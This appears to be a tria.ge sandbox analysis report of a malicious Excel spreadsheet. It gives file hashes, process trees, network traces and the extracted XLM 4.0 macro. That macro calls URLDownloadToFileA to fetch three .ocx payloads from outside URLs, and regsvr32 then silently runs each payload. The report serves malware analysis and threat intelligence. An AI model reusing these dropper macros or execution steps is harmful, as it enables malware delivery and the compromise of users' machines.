Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

8

7a7688cd6f...62.xls

windows7-x64

10

7a7688cd6f...62.xls

windows10-2004-x64

10

Analysis

  • max time kernel
    133s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/11/2024, 00:44 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7a7688cd6f7077b47529fd6263bcc395b91b0966492aa71fad97580edfa8f862.xls

  • Size

    71KB

  • MD5

    7d7d21d0c976b9711aa88f72bacc8f13

  • SHA1

    544b7bd2a8422f013cdd5dd85d679fbf1d4ca486

  • SHA256

    7a7688cd6f7077b47529fd6263bcc395b91b0966492aa71fad97580edfa8f862

  • SHA512

    df1c0634912caff5ad17ef2a1ed47a2f6c2a7348887cff482ce089aff883c1f08d7c8b679709243aa33ed36b491faf3844488c1e4d5fde5bb27d534cff5acfe8

  • SSDEEP

    1536:DhKpb8rGYrMPe3q7Q0XV5xtezE8vG8UM+gH+hDcnTLiQrRTZws8EYO:FKpb8rGYrMPe3q7Q0XV5xtezE8vG8UMv

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://papillonweb.fr/wp-content/G8z08q0mj/", "..\usoiy1.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://brennanasia.com/images/6IwPBHbnUvfgugV1b/", "..\usoiy2.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://estacioesportivavilanovailageltru.cat/tmp/IgSyqwgJmE/", "..\usoiy3.ocx")
URLs
xlm40.dropper

https://papillonweb.fr/wp-content/G8z08q0mj/
xlm40.dropper

http://brennanasia.com/images/6IwPBHbnUvfgugV1b/
xlm40.dropper

https://estacioesportivavilanovailageltru.cat/tmp/IgSyqwgJmE/

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\7a7688cd6f7077b47529fd6263bcc395b91b0966492aa71fad97580edfa8f862.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4148
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\usoiy1.ocx
      2⤵
      • Process spawned unexpected child process
      PID:1884
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\usoiy2.ocx
      2⤵
      • Process spawned unexpected child process
      PID:2964
    • C:\Windows\System32\regsvr32.exe
      C:\Windows\System32\regsvr32.exe /S ..\usoiy3.ocx
      2⤵
      • Process spawned unexpected child process
      PID:4272

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    104.219.191.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    104.219.191.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    roaming.officeapps.live.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    uks-azsc-000.roaming.officeapps.live.com
    uks-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
    osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
    IN A
    52.109.28.47
  • flag-gb
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    EXCEL.EXE
    Remote address:
    52.109.28.47:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_127
    X-OfficeVersion: 16.0.18311.30577
    X-OfficeCluster: uks-000.roaming.officeapps.live.com
    Content-Security-Policy-Report-Only: script-src 'nonce-roIIAWx80JGbpbz4tFlo1d1q+EF5LYX39+hJcu+gutEX84xniPuRhC5QZ++ay3A6SxSdDTyXsrP9LNFkdrVNtQ54WNN1l08cJHNg5caby2gumJza/oBittXfBnxihn9aK3O0YF5s7ULnly2xjeeeIU+h32uGjnsm4no3YmeBt4E=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
    X-CorrelationId: 09390924-e62c-40a6-87e3-53408f816947
    X-Powered-By: ASP.NET
    Date: Thu, 21 Nov 2024 00:44:41 GMT
    Content-Length: 654
  • flag-us
    DNS
    papillonweb.fr
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    papillonweb.fr
    IN A
    Response
    papillonweb.fr
    IN A
    163.172.100.17
  • flag-fr
    GET
    https://papillonweb.fr/wp-content/G8z08q0mj/
    EXCEL.EXE
    Remote address:
    163.172.100.17:443
    Request
    GET /wp-content/G8z08q0mj/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: papillonweb.fr
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Thu, 21 Nov 2024 00:44:42 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Set-Cookie: PHPSESSID=5cngjgsmu6rsd849gt4a78puv3; path=/; secure; HttpOnly
    Vary: Accept-Encoding
    Location: https://papillonweb.fr
    Referrer-Policy: no-referrer-when-downgrade
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
  • flag-fr
    GET
    https://papillonweb.fr/
    EXCEL.EXE
    Remote address:
    163.172.100.17:443
    Request
    GET / HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: papillonweb.fr
    Connection: Keep-Alive
    Cookie: PHPSESSID=5cngjgsmu6rsd849gt4a78puv3
    Response
    HTTP/1.1 200 OK
    Date: Thu, 21 Nov 2024 00:44:43 GMT
    Server: Apache
    Vary: Accept-Encoding,Cookie
    Last-Modified: Thu, 14 Nov 2024 21:19:05 GMT
    ETag: "60a6-626e6000c52bf"
    Accept-Ranges: bytes
    Content-Length: 24742
    Referrer-Policy: no-referrer-when-downgrade
    Pragma: public
    Cache-Control: max-age=3600, public
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Content-Encoding: gzip
  • flag-us
    DNS
    47.28.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    47.28.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    47.28.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    47.28.109.52.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    17.100.172.163.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.100.172.163.in-addr.arpa
    IN PTR
    Response
    17.100.172.163.in-addr.arpa
    IN PTR
    papillonwebclients ipsolutionfr
  • flag-us
    DNS
    17.100.172.163.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    17.100.172.163.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    74.32.126.40.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    74.32.126.40.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    168.245.100.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.245.100.95.in-addr.arpa
    IN PTR
    Response
    168.245.100.95.in-addr.arpa
    IN PTR
    a95-100-245-168deploystaticakamaitechnologiescom
  • flag-us
    DNS
    168.245.100.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.245.100.95.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    brennanasia.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    brennanasia.com
    IN A
    Response
    brennanasia.com
    IN A
    103.204.130.53
  • flag-sg
    GET
    http://brennanasia.com/images/6IwPBHbnUvfgugV1b/
    EXCEL.EXE
    Remote address:
    103.204.130.53:80
    Request
    GET /images/6IwPBHbnUvfgugV1b/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: brennanasia.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 404 Not Found
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
    pragma: no-cache
    content-type: text/html
    content-length: 1251
    date: Thu, 21 Nov 2024 00:44:44 GMT
    server: LiteSpeed
    strict-transport-security: max-age=63072000; includeSubDomains
    x-frame-options: SAMEORIGIN
    x-content-type-options: nosniff
  • flag-us
    DNS
    estacioesportivavilanovailageltru.cat
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    estacioesportivavilanovailageltru.cat
    IN A
    Response
    estacioesportivavilanovailageltru.cat
    IN A
    104.21.93.247
    estacioesportivavilanovailageltru.cat
    IN A
    172.67.216.229
  • flag-us
    DNS
    estacioesportivavilanovailageltru.cat
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    estacioesportivavilanovailageltru.cat
    IN A
  • flag-us
    DNS
    53.130.204.103.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.130.204.103.in-addr.arpa
    IN PTR
    Response
    53.130.204.103.in-addr.arpa
    IN PTR
    server2 dagadudigitalcom
  • flag-us
    DNS
    53.130.204.103.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.130.204.103.in-addr.arpa
    IN PTR
  • flag-us
    GET
    https://estacioesportivavilanovailageltru.cat/tmp/IgSyqwgJmE/
    EXCEL.EXE
    Remote address:
    104.21.93.247:443
    Request
    GET /tmp/IgSyqwgJmE/ HTTP/2.0
    host: estacioesportivavilanovailageltru.cat
    accept: */*
    ua-cpu: AMD64
    accept-encoding: gzip, deflate
    user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Response
    HTTP/2.0 301
    date: Thu, 21 Nov 2024 00:44:48 GMT
    content-type: text/html; charset=UTF-8
    location: https://parchiavventurasardegna.it/post/spectrums-california-debacle-outage-highlights-need-for
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache, must-revalidate, max-age=0
    x-redirect-by: WordPress
    x-turbo-charged-by: LiteSpeed
    cf-cache-status: DYNAMIC
    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFGp4aWtxVGd%2B3KlWnra%2FTFtG2ceVlMajqw%2FyZSEUjIxdRteWUdGHWd6tRH%2FMF4SDk0%2Fy7jsqN6jEwMf%2BKPOuyYumYhUlPYO4evrzUPN8iKb0V2LUFpwar4VYEZ1KYER2HbQe5mNhdweJYylzFS1qk5%2F1FbXnPBF"}],"group":"cf-nel","max_age":604800}
    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    server: cloudflare
    cf-ray: 8e5ca73a38276382-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=30041&sent=8&recv=13&lost=0&retrans=1&sent_bytes=3478&recv_bytes=665&delivery_rate=146882&cwnd=255&unsent_bytes=0&cid=79917825647abde7&ts=1339&x=0"
  • flag-us
    DNS
    c.pki.goog
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    c.pki.goog
    IN A
    Response
    c.pki.goog
    IN CNAME
    pki-goog.l.google.com
    pki-goog.l.google.com
    IN A
    142.250.200.3
  • flag-gb
    GET
    http://c.pki.goog/r/gsr1.crl
    EXCEL.EXE
    Remote address:
    142.250.200.3:80
    Request
    GET /r/gsr1.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 1739
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Thu, 21 Nov 2024 00:14:01 GMT
    Expires: Thu, 21 Nov 2024 01:04:01 GMT
    Cache-Control: public, max-age=3000
    Age: 1845
    Last-Modified: Mon, 07 Oct 2024 07:18:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
  • flag-gb
    GET
    http://c.pki.goog/r/r4.crl
    EXCEL.EXE
    Remote address:
    142.250.200.3:80
    Request
    GET /r/r4.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: c.pki.goog
    Response
    HTTP/1.1 200 OK
    Accept-Ranges: bytes
    Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
    Cross-Origin-Resource-Policy: cross-origin
    Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
    Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
    Content-Length: 436
    X-Content-Type-Options: nosniff
    Server: sffe
    X-XSS-Protection: 0
    Date: Thu, 21 Nov 2024 00:27:47 GMT
    Expires: Thu, 21 Nov 2024 01:17:47 GMT
    Cache-Control: public, max-age=3000
    Age: 1020
    Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
    Content-Type: application/pkix-crl
    Vary: Accept-Encoding
  • flag-us
    DNS
    247.93.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    247.93.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    3.200.250.142.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    3.200.250.142.in-addr.arpa
    IN PTR
    Response
    3.200.250.142.in-addr.arpa
    IN PTR
    lhr48s29-in-f31e100net
  • flag-us
    DNS
    parchiavventurasardegna.it
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    parchiavventurasardegna.it
    IN A
    Response
    parchiavventurasardegna.it
    IN A
    104.21.90.214
    parchiavventurasardegna.it
    IN A
    172.67.161.108
  • flag-us
    GET
    https://parchiavventurasardegna.it/post/spectrums-california-debacle-outage-highlights-need-for
    EXCEL.EXE
    Remote address:
    104.21.90.214:443
    Request
    GET /post/spectrums-california-debacle-outage-highlights-need-for HTTP/2.0
    host: parchiavventurasardegna.it
    accept: */*
    ua-cpu: AMD64
    accept-encoding: gzip, deflate
    user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Response
    HTTP/2.0 200
    date: Thu, 21 Nov 2024 00:44:48 GMT
    content-type: text/html; charset=UTF-8
    x-powered-by: Express
    cf-cache-status: DYNAMIC
    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7sfJNWQ4qflAuaeubbIKVOUc1pcXCenCpwQVdy1LQO6ClDmiXQbC%2Bo3FFTctFZyzpDCcOsT0drQXiMsQbXYJ5OaVJYjyWMvNEHDQndY5zRo8TIrc7FAAnUCnn5Ins5Xe1P4AUhUUfuAtJ4pXIw%3D%3D"}],"group":"cf-nel","max_age":604800}
    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    server: cloudflare
    cf-ray: 8e5ca7424ba1943c-LHR
    content-encoding: gzip
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=33072&sent=8&recv=12&lost=0&retrans=0&sent_bytes=3440&recv_bytes=677&delivery_rate=86265&cwnd=255&unsent_bytes=0&cid=6584ddeb60037f60&ts=526&x=0"
  • flag-us
    DNS
    214.90.21.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    214.90.21.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.214.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.214.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    43.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    43.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 52.109.28.47:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    EXCEL.EXE
    2.0kB
     8.2kB
     13
    11

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 163.172.100.17:443
    https://papillonweb.fr/
    tls, http
    EXCEL.EXE
    3.4kB
     31.4kB
     37
    30

    HTTP Request

    GET https://papillonweb.fr/wp-content/G8z08q0mj/

    HTTP Response

    301

    HTTP Request

    GET https://papillonweb.fr/

    HTTP Response

    200
  • 103.204.130.53:80
    http://brennanasia.com/images/6IwPBHbnUvfgugV1b/
    http
    EXCEL.EXE
    642 B
     1.8kB
     7
    4

    HTTP Request

    GET http://brennanasia.com/images/6IwPBHbnUvfgugV1b/

    HTTP Response

    404
  • 104.21.93.247:443
    https://estacioesportivavilanovailageltru.cat/tmp/IgSyqwgJmE/
    tls, http2
    EXCEL.EXE
    1.5kB
     4.8kB
     18
    12

    HTTP Request

    GET https://estacioesportivavilanovailageltru.cat/tmp/IgSyqwgJmE/

    HTTP Response

    301
  • 142.250.200.3:80
    http://c.pki.goog/r/r4.crl
    http
    EXCEL.EXE
    602 B
     3.9kB
     8
    6

    HTTP Request

    GET http://c.pki.goog/r/gsr1.crl

    HTTP Response

    200

    HTTP Request

    GET http://c.pki.goog/r/r4.crl

    HTTP Response

    200
  • 104.21.90.214:443
    https://parchiavventurasardegna.it/post/spectrums-california-debacle-outage-highlights-need-for
    tls, http2
    EXCEL.EXE
    2.2kB
     21.2kB
     33
    28

    HTTP Request

    GET https://parchiavventurasardegna.it/post/spectrums-california-debacle-outage-highlights-need-for

    HTTP Response

    200
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
     90 B
     1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
     147 B
     1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    EXCEL.EXE
    73 B
     244 B
     1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.28.47

  • 8.8.8.8:53
    papillonweb.fr
    dns
    EXCEL.EXE
    60 B
     76 B
     1
    1

    DNS Request

    papillonweb.fr

    DNS Response

    163.172.100.17

  • 8.8.8.8:53
    47.28.109.52.in-addr.arpa
    dns
    142 B
     145 B
     2
    1

    DNS Request

    47.28.109.52.in-addr.arpa

    DNS Request

    47.28.109.52.in-addr.arpa

  • 8.8.8.8:53
    17.100.172.163.in-addr.arpa
    dns
    146 B
     120 B
     2
    1

    DNS Request

    17.100.172.163.in-addr.arpa

    DNS Request

    17.100.172.163.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    146 B
     144 B
     2
    1

    DNS Request

    95.221.229.192.in-addr.arpa

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    74.32.126.40.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    74.32.126.40.in-addr.arpa

  • 8.8.8.8:53
    168.245.100.95.in-addr.arpa
    dns
    146 B
     139 B
     2
    1

    DNS Request

    168.245.100.95.in-addr.arpa

    DNS Request

    168.245.100.95.in-addr.arpa

  • 8.8.8.8:53
    brennanasia.com
    dns
    EXCEL.EXE
    61 B
     77 B
     1
    1

    DNS Request

    brennanasia.com

    DNS Response

    103.204.130.53

  • 8.8.8.8:53
    estacioesportivavilanovailageltru.cat
    dns
    EXCEL.EXE
    166 B
     115 B
     2
    1

    DNS Request

    estacioesportivavilanovailageltru.cat

    DNS Request

    estacioesportivavilanovailageltru.cat

    DNS Response

    104.21.93.247
    172.67.216.229

  • 8.8.8.8:53
    53.130.204.103.in-addr.arpa
    dns
    146 B
     112 B
     2
    1

    DNS Request

    53.130.204.103.in-addr.arpa

    DNS Request

    53.130.204.103.in-addr.arpa

  • 8.8.8.8:53
    c.pki.goog
    dns
    EXCEL.EXE
    56 B
     107 B
     1
    1

    DNS Request

    c.pki.goog

    DNS Response

    142.250.200.3

  • 8.8.8.8:53
    247.93.21.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    247.93.21.104.in-addr.arpa

  • 8.8.8.8:53
    3.200.250.142.in-addr.arpa
    dns
    72 B
     110 B
     1
    1

    DNS Request

    3.200.250.142.in-addr.arpa

  • 8.8.8.8:53
    parchiavventurasardegna.it
    dns
    EXCEL.EXE
    72 B
     104 B
     1
    1

    DNS Request

    parchiavventurasardegna.it

    DNS Response

    104.21.90.214
    172.67.161.108

  • 8.8.8.8:53
    214.90.21.104.in-addr.arpa
    dns
    72 B
     134 B
     1
    1

    DNS Request

    214.90.21.104.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
     160 B
     1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    172.214.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.214.232.199.in-addr.arpa

  • 8.8.8.8:53
    43.229.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    43.229.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
    Filesize

    1KB

    MD5

    568bada6e136664b88648eeeec377273

    SHA1

    6dba6ede00426a36d60038d2244f9fdfde5ac098

    SHA256

    5f236701114704eae6433b0db66ecc0a05e4c9144337513f8d14f2320e7bda1a

    SHA512

    23a847859ca0ba4c3f233eee4f9dac5a86aeba09e9d5266379bfa7bdd1b953aead00a5be2c25759631517ec96cb7fe909d2d42e04dc095824c6f925f1cccefc7

    Download Submit

  • C:\Users\Admin\usoiy1.ocx
    Filesize

    111KB

    MD5

    a32ddff026d0c45aec7bf4c84fb00e6f

    SHA1

    377fa6800165a19b9f2b760ba1b970ab3c09d3ae

    SHA256

    79a01b0fa26cfd15bd528c57d32d2bb6e6a984f2b0f4d95d7b24dfcf1dcb89e9

    SHA512

    de15e922e1bf7c43e73050acaedaa1b9c7978cf3ac29ccd24ce114617a93cd6d6fa035f9226bd32fa2c72892ffb8fdf92665b322e90ffeb82d85f306ee30cf9e

    Download Submit

  • C:\Users\Admin\usoiy3.ocx
    Filesize

    75KB

    MD5

    e4841206fed7dcc05abeb2543cc24acb

    SHA1

    1a7ee4436d935c1aab414653dd81388059b2c948

    SHA256

    a1d9b74e0513145be6e2aa9d0cc6ed8eb75a64b67c7b65e5c351212df7ed46df

    SHA512

    cd9235ac4ab25c6c55d03bf8a59b7e248179da3f1469974f48e1c1e783e6194e2c7f9bc925398ad256b36dd93c0ec59cc2d614daca62b9579652bfc83978c8b1

    Download Submit

  • memory/4148-10-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-9-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-7-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-8-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4148-5-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4148-6-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-11-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-12-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-13-0x00007FFE0C820000-0x00007FFE0C830000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4148-0-0x00007FFE4E96D000-0x00007FFE4E96E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4148-14-0x00007FFE0C820000-0x00007FFE0C830000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4148-4-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-15-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-16-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-1-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4148-40-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-42-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-41-0x00007FFE4E96D000-0x00007FFE4E96E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4148-2-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4148-48-0x00007FFE4E8D0000-0x00007FFE4EAC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/4148-3-0x00007FFE0E950000-0x00007FFE0E960000-memory.dmp

    Filesize

    64KB

    Download

We care about your privacy.

